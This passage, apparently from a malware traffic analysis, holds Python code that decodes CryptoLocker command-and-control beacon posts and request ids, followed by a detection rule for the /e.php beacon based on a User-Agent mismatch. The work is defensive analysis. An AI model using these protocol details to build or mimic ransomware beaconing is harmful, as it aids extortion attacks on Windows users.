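    s = "".join(data_b64.split())
    head = base64.b64decode(s[:HEADER_B64])
    tail = s[HEADER_B64:]
    try:
        payload = head[17:] + base64.b64decode(tail + "=" * (-len(tail) % 4))
    except ValueError:  # binascii.Error: tail truncated in transit or transcription
        payload = None
    return {"type": head[0], "bot_id": head[1:17].decode("ascii"), "payload": payload}


def get_id(request_line: str):
    """Pull id= out of 'GET /e.php?id=... HTTP/1.1'."""
    target = request_line.split(" ")[1]
    return parse_qs(urlsplit(target).query).get("id", [None])[0]


def describe(payload) -> str:
    if payload is None:
        return "undecodable"
    if len(set(payload)) == 1:
        return f"{len(payload)} x 0x{payload[0]:02x} (constant byte)"
    return f"{len(payload)} bytes, {len(set(payload))} distinct values"


if __name__ == "__main__":
    for label, body in (("POST 1", POST_1), ("POST 2", POST_2)):
        b = decode_beacon(body)
        print(f"{label}: type=0x{b['type']:02x} id={b['bot_id']} payload={describe(b['payload'])}")
    print("GET id =", get_id(GET_LINE))
```

The User-Agent claims Firefox on Mac OS X 10.7 for traffic that originates from a Windows host (CryptoLocker is a Windows executable), so a UA/OS mismatch rule combined with a `POST /e.php` carrying a `data=` body catches this beacon without depending on the domain as an IOC.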